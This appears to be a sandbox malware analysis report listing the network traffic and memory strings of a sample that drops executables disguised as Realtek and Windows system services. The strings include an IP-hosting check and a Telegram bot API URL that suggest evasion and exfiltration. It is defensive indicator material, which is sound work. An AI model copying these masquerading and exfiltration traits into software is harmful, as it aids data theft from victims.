                          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: ip-api.com
                          Source: global trafficDNS traffic detected: DNS query: discord.gg
                          Source: global trafficDNS traffic detected: DNS query: discord.com
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                          Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                          Source: unknownHTTP traffic detected: POST /api/v9/science HTTP/1.1Host: discord.comConnection: keep-aliveContent-Length: 1126sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxIX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkContent-Type: application/jsonX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Origin: https://discord.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: powershell.exe, 00000017.00000002.3126653247.00000242A9F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 00000009.00000002.2420978906.0000019C53398000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2247904986.0000014BF24B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                          Source: chromecache_179.8.drString found in binary or memory: http://discord.gg/fortnite
                          Source: Realtek HD Audio Universal Service.exe, 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, Windows Shell Experience Host.exe, 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Windows Shell Experience Host.exe.0.dr, Realtek HD Audio Universal Service.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                          Source: EsgeCzT4do.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                          Source: EsgeCzT4do.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: powershell.exe, 0000000A.00000002.2237154955.0000014BE9CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2489098317.0000016510078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2809515501.00000287CE518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3045850370.00000242A1873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3401686739.0000027B58150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000009.00000002.2262535346.0000019C3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B48309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: powershell.exe, 00000009.00000002.2262535346.0000019C3AB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B480E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849C911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000009.00000002.2262535346.0000019C3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B48309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000014.00000002.2880384174.00000287D6C60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3491603064.0000027B606F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                          Source: powershell.exe, 0000000A.00000002.2247904986.0000014BF24B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                          Source: powershell.exe, 00000009.00000002.2262535346.0000019C3AB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B480E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849C911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: Windows Shell Experience Host.exe, 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Windows Shell Experience Host.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com
                          Source: chromecache_179.8.drString found in binary or memory: https://discord.com/blog/important-policy-updates
                          Source: chromecache_179.8.drString found in binary or memory: https://discord.com/download
                          Source: chromecache_179.8.drString found in binary or memory: https://discord.com/guidelines
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=ar
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=bg
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=cs
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=da
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=de
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=el
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=en-GB
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=en-US
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=es-419
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=es-ES
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=fi
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=fr
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=he
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=hi
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=hr
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=hu
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=id
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=it
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=ja
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=ko
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=lt
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=nl
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=no
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=pl
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=pt-BR
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=ro
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=ru
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=sv-SE
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=th
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=tr
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=uk
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=vi
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=zh-CN
                          Source: chromecache_172.8.drString found in binary or memory: https://discord.com/invite/BNXa5rYFXM?locale=zh-TW
                          Source: chromecache_172.8.drString found in binary or memory: https://discordapp.com
                          Source: powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 0000000A.00000002.2237154955.0000014BE9CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2489098317.0000016510078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2809515501.00000287CE518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3045850370.00000242A1873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3401686739.0000027B58150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: chromecache_179.8.drString found in binary or memory: https://support.discord.com/hc/en-us/articles/21084266106775-New-Server-Notification-Settings-Experi
                          Source: chromecache_179.8.drString found in binary or memory: https://support.discord.com/hc/en-us/articles/360017693772-Managing-Subscriptions-and-Billing-FAQ
                          Source: chromecache_179.8.drString found in binary or memory: https://support.discord.com/hc/en-us/articles/4410339366295-Paid-Services-Terms
                          Source: chromecache_179.8.drString found in binary or memory: https://support.discord.com/hc/en-us/requests/new?ticket_form_id=360000118612
                          Source: chromecache_179.8.drString found in binary or memory: https://twitter.com/discord
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
